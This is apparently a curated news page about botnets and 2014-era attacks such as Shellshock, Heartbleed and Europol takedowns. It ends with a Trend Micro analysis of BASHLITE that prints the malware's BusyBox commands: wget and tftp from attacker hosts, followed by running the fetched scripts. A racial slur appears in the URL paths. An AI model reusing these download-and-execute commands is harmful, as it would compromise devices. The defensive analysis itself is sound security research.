Botnets
Scooped by The Historical Cyber Consortium

Microsoft, US feds disrupt Citadel botnet network | PCWorld

Microsoft and the U.S. Federal Bureau of Investigation have taken aim at a botnet network based on malware called Citadel that is held responsible for stealing people's online banking information and personal identities.

Rescooped by The Historical Cyber Consortium from ReactNow - Latest News updated around the clock

International police operation targets polymorphic Beebone botnet | Europol

The Hague, The Netherlands On 8 April, Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), joined forces w...

Via ReactNow

Rescooped by The Historical Cyber Consortium from SME Cyber Security

Global Cybercrime Group Working To Take Down Major Botnet

Called Beebone, the botnet installs malware on victims' computers without their consent

Via Roger Smith
Roger Smith's curator insight, April 19, 8:41 PM

As fast as they are discovered and disconnected, more command and control systems are born. The proliferation of Botnets makes this a tiresome but very necessary task.

The work is made harder and more difficult because the cybercriminals use all of the technology we use to ensure our data is safe, including TLS and high end encryption.

Scooped by The Historical Cyber Consortium

GitHub Is Back to Normal After Attacks That Were Blamed on China

The U.S. website GitHub, heavily frequented by coders and other technorati, reported on Wednesday that it was operating normally for the first time in several days after attacks blamed on China.

Scooped by The Historical Cyber Consortium

GitHub suffers 'largest DDoS' attack in site's history - ZDNet

US coding website GitHub is fending off a DDoS onslaught focused on shutting down anticensorship tools.

Scooped by The Historical Cyber Consortium

'Energetic' Bear Under The Microscope

Kaspersky Lab report finds more industries hit by the infamous cyber espionage campaign -- and evidence pointing to French and Swedish-speaking attackers as well as Eastern European ones.

Rescooped by The Historical Cyber Consortium from IT Support and Hardware for Clinics

More than 1,200 popular Android apps still vulnerable to FREAK - CNET

Researchers from FireEye claim the security risks posed by the FREAK bug are far from over.

Via Technical Dr. Inc.

Scooped by The Historical Cyber Consortium

Heartbleed, Shellshock and developer apathy let hackers steal a billion ... - V3.co.uk

Poor coding and password security makes it too easy for criminals, warns IBM

Rescooped by The Historical Cyber Consortium from News You Can Use - NO PINKSLIME

Europol takedown of Ramnit botnet frees 3.2 million PCs from cybercriminals' grasp

In an international operation coordinated with multiple law enforcement and industry partners, Europol led a takedown of the infrastructure of the Ramnit botnet that infected 3.2 million Windows co...

Via #BBBundyBlog #NOMORELIES Tom Woods #Activist Award #Scoopiteer >20,000 Sources >250K Connections http://goo.gl/ruHO3Q

Scooped by The Historical Cyber Consortium

The Rebirth of Dofoil

Dofoil, also known as Smoke Loader, is a modularized botnet that has existed for a few years. Since 2013, we have not received any new variants of this bot and the command-and-control (C&C) servers of its previous variants are no longer accessibl...

Scooped by The Historical Cyber Consortium

A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332

A proof of concept exploit for a Windows vulnerability has recently been published by a Chinese researcher and shows that it’s fairly simple to write malicious VBScript code for attacks for unpatched s

Scooped by The Historical Cyber Consortium

Is MS14-066 the Windows Shellshock?

The latest Patch Tuesday from Microsoft (November 11, 2014) includes fixes for some major vulnerabilities, including remote code execution bugs affecting core Windows components and Internet Explorer.

Rescooped by The Historical Cyber Consortium from Surfing the Broadband Bit Stream

Report: Criminals use Shellshock against mail servers to build botnet

Targeting message transfer agents (MTAs), mail delivery agents (MDAs), and spam filters, criminals are using Shellshock as a means to create botnets.

Via Chuck Sherwood, Senior Associate, TeleDimensions, Inc

Scooped by The Historical Cyber Consortium

Facebook Breaks Up Cryptocurrency Mining Botnet 'Lecpetex'

Facebook has successfully dismantled a major bitcoin botnet operated by a small team of cyber criminals based in Greece.

Scooped by The Historical Cyber Consortium

Lax Security Opens the Door for Mass Scale Abuse of SOHO Routers | Incapsula.com

The attacks we will describe are enabled by what we perceive as particularly careless security practices. Many of these botnet devices remain active, even as this is being written...

Scooped by The Historical Cyber Consortium

Puush urges users to change passwords after cyber attack - SC Magazine

The screen sharing platform Puush was hit by a cyber attack this weekend that injected malware into the server.

Scooped by The Historical Cyber Consortium

Compromised WordPress sites launch drive-by attacks off Pirate Bay clone

This Pirate Bay clone is actively pushing the Nuclear exploit kit with an iframe and will infect vulnerable visitors via drive-by download attacks. We've also detected several WordPress sites injected with the same iframe.

Scooped by The Historical Cyber Consortium

G DATA: Nested malware builds up botnet

Experts at German security provider G DATA have discovered a number of malware programs that are aimed at building up a botnet and can be controlled using the same Command and Control Server. The two malware instances that the analysts have investigated by way of an example employ significantly different routes to infection. The security experts believe that this attack was planned by one or more perpetrators, distributing the malware en masse so that the botnet can then be sold or rented. The malware distributes itself via macros in manipulated Word documents that are sent as an email attachment. In some cases the fraudsters send a fake rail card invoice. G DATA security solutions detect the malware and prevent the infection.

Scooped by The Historical Cyber Consortium

Massive OpenSSL audit hopes to squash Heartbleed-like bugs - GCN.com (blog)

The audit by Cryptography Services will cover a range of security concerns but will focus primarily on the Transport Layer Security stacks, protocol flow, state transitions and memory management.

Rescooped by The Historical Cyber Consortium from d@n3n

The Andromeda/Gamarue botnet is on the rise again

Attackers use complex multi-stage macro dropper to deliver malware

Via Danen Raas

Scooped by The Historical Cyber Consortium

Macro-based malware is making a comeback, researchers warn

For the past several months, different groups of attackers have distributed malware through Microsoft Office documents that contain malicious macros, reviving a technique that has been out of style for more than a decade.

Rescooped by The Historical Cyber Consortium from SSH infosecuration

Microsoft SSL bug could be worse than Heartbleed, say researchers

Researchers say the SSL flaw in most versions of Microsoft Windows could be worse than Heartbleed and Shellshock

Via SSH Communications Security

Scooped by The Historical Cyber Consortium

BASHLITE Affects Devices Running on BusyBox

When news of the Shellshock vulnerability broke out at the end of September, we spotted several attacks that leveraged the said vulnerability, thus manifesting the prevalence or even evolution on how attackers used the exploit. For instance, attackers used Shellshock to target SMTP servers, launch botnet attacks, and even to download KAITEN source code among others.

We have continuously monitored this vulnerability and on our latest research, we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scan the network for devices/machines running on BusyBox, and log in using a set of usernames and passwords (see figure 4 below). Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the BusyBox system. BusyBox is built on top of the Linux kernel and used by small devices such as routers.

Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive. This is seen in the following commands:

    cd /tmp
    busybox wget http://6916337115/.niggers/bin.sh
    busybox tftp -r bin.sh -g 696337115
    sh bin.sh
    echo -e 'x62x69x6ex66x61x67x74'rn

    cd /tmp/
    busybox wget http://1761025037/.niggers/bin2.sh
    busybox tftp -r bin2.sh -g 1761025037
    sh bin2.sh
    echo -e 'x62x69x6ex66x61x67x74'rn

This means that the malware can do the following commands on the affected devices:

- Change to the temporary folder where generally there is file write access
- Download a remote file, depending on whether the shell script is hosted via HTTP or TFTP. There is a ‘fail-safe’ mechanism to achieve its download routine. This means that if in the first command, it doesn’t execute any file, it will try again to connect to the URL and download the file.
- Run the downloaded shell script.
- Perform previous “fingerprinting” routine, to check if the device runs on BusyBox.

Figure 1. Code snippets of BASHLITE downloading files via BusyBox

The previous BASHLITE sample (detected as ELF_BASHLITE.A) used BusyBox just to echo the string 'gayfgt' if the remote malicious user invokes the command SCANNER ON:

Figure 2. Scanner mode 'ON'

Figure 3. Code snippet of ELF_BASHLITE.A where the string, ‘gayfgt’ is represented in octal form

This is done to check if the device runs BusyBox, however it does not execute any commands (unlike the new samples). BASHLITE attempts to log into the remote systems by using the default set of usernames and passwords:

Figure 4. Set of usernames and passwords

User Impact and Countermeasures

Devices running on BusyBox can be possibly affected by BASHLITE. As such, a remote attacker can issue commands or download other files on the devices thus compromising its security.

Since the initial discovery of Shellshock vulnerability, Trend Micro has provided protection via Deep Security rules and Smart Protection Network that detects the exploit and all related malware payload. We strongly advised users to change the default usernames and passwords and disable remote shell if possible to these devices.

For more information on Shellshock vulnerability, you can read our Summary of Shellshock-Related Stories and Materials. Users can also get free protection from Shellshock via these tools.

The following hashes are related to this threat:

    ffaa3c714ae82f954089f49828dac795327bf26e
    e51ad7cc8de05dc7991e591ee2f4eb53b8f05ae4
    82e47cdbedeef6812ea84549ffc2f385a03e57de
    fd5c0f7575e6aa1f9cea5bb3977d6e037bfe6421

With additional insights from Joseph Cepe

Scooped by The Historical Cyber Consortium

Timeline of Sandworm Attacks | Security Intelligence Blog | Trend Micro

What can we learn from the timeline of Sandworm attacks?